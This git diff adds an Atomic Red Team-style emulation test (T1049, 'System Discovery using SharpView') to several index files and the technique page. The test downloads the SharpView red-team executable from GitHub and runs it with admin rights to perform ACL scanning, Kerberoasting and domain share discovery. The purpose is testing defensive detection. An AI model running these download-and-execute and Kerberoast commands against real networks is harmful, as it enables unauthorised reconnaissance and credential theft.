diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 05cfd87a..ec371714 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -660,6 +660,7 @@ discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh +discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b2555df7..70c42fb0 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -465,6 +465,7 @@ discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Acti discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell +discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 5e778201..37dc3296 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1155,6 +1155,7 @@ - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos] + - Atomic Test #4: System Discovery using SharpView [windows] - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #2: System Owner/User Discovery [linux, macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 62c22ec4..503a9d2d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -851,6 +851,7 @@ - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] + - Atomic Test #4: System Discovery using SharpView [windows] - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 246a2d24..cac1c592 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47701,6 +47701,48 @@ discovery: netstat who -a name: sh + - name: System Discovery using SharpView + auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 + description: "Get a listing of network connections, domains, domain users, and + etc. \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon + successful execution, cmd.exe will execute sharpview.exe . Results + will output via stdout.\n" + supported_platforms: + - windows + input_arguments: + SharpView_url: + description: sharpview download URL + type: url + default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true + SharpView: + description: Path of the executable opensource redteam tool used for the + performing this atomic. + type: path + default: PathToAtomicsFolder\T1049\bin\SharpView.exe + syntax: + description: Arguements method used along with SharpView to get listing + of network connections, domains, domain users, and etc. + type: String + default: "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" + \n" + dependency_executor_name: powershell + dependencies: + - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) + +' + prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + executor: + name: powershell + elevation_required: true + command: | + $syntaxList = #{syntax} + foreach ($syntax in $syntaxList) { + #{SharpView} $syntax -} T1033: technique: created: '2017-05-31T21:30:35.733Z' diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index a1b312df..414e5e25 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -14,6 +14,8 @@ Utilities and commands that acquire this information include [netstat](https://a - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos) +- [Atomic Test #4 - System Discovery using SharpView](#atomic-test-4---system-discovery-using-sharpview) +
@@ -107,4 +109,52 @@ echo "Install netstat on the machine."; exit 1; +
+
+ +## Atomic Test #4 - System Discovery using SharpView +Get a listing of network connections, domains, domain users, and etc. +sharpview.exe located in the bin folder, an opensource red-team tool. +Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| +| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe| +| syntax | Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. | String | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$syntaxList = #{syntax} +foreach ($syntax in $syntaxList) { +#{SharpView} $syntax -} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{SharpView}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null +Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" +``` + + + +